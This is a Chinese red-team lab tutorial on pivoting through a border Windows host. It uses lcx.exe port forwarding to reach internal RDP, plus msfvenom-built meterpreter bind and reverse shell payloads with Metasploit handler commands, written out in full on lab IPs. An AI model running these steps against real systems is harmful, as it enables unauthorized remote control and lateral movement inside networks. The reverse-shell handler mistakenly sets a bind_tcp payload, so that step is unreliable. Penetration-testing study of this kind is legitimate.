目录
0x01 正向端口转发
0x02 反向端口转发
0x03 msf正向shell
0x04 msf反向shell
注:
边界机器 win08 192.168.222.175
内网机器 win7 192.168.222.137
msf机器 Ubuntu 192.168.222.177
0x01 正向端口转发
在边界机器上执行端口转发命令,让来自指定端口的流量全部转发到内网指定IP指定端口上。
这里关闭了防火墙,在正常情况下请使用netsh来对端口进行开放,详细步骤可以参考以前的文章【使用netsh来进行端口转发】
这里我们将本地53端口的全部流量都转发到内网机器的3389端口,从而进行远程连接
lcx.exe -tran 53 192.168.222.137 3389
当然在执行完之后,我们再确定一下端口是否已经启用
然后我们在本地来进行远程连接
0x02 反向端口转发
如果我们只有当前目标的webshell,并没有边界主机可以利用的话,就可以通过反向端口转发来使内网流量都转发到自己的主机上。
注:这里我们用边界机器win08来代替我们的本地主机
首先在本地机器执行监听
lcx.exe -listen 53 1234
使用netstat -ano 确保端口已经启用
然后在目标机器(win7)上执行
lcx.exe -slave 192.168.222.175 53 127.0.0.1 3389
即将本地3389端口的流量都转发到win8机器的53端口上,如果有边界服务器可以利用的话,则在边界服务器执行该命令,将对应的IP和端口改变就可以了。
然后在本地(win8)远程连接即可
0x03 msf正向shell
使用lcx执行正向端口转发,去连接内网的meterpreter
首先先用msf生成一个马
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe
然后去边界机器执行lcx的正向端口转发,将来自53端口的流量全部转发到内网的meterpreter上
lcx.exe -tran 53 192.168.222.137 53
然后去内网机器运行我们的马
再回到Ubuntu上,对其进行监听,监听边界机器的53端口即可
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run
0x04 msf反向shell
反向shell也是一样的道理
首先先生成我们的马,这里回连的IP和端口都是边界机器的
msfvenom -p windows/x64/meterpreter/reverse_tcp lport=53 lhost=192.168.222.175 -f exe >> 123.exe
然后到边界机器上执行监听
lcx.exe -listen 53 8888
到内网机器执行我们的马
回到Ubuntu上,对其进行监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lhost 192.168.222.175
set lport 8888
exploit -j
可见第一次并没有成功弹回session,这个使由于lcx的原因,多尝试两次就可以了
文章首发公众号:无心的梦呓(wuxinmengyi)
这是一个记录红队学习、信安笔记,个人成长的公众号
扫码关注即可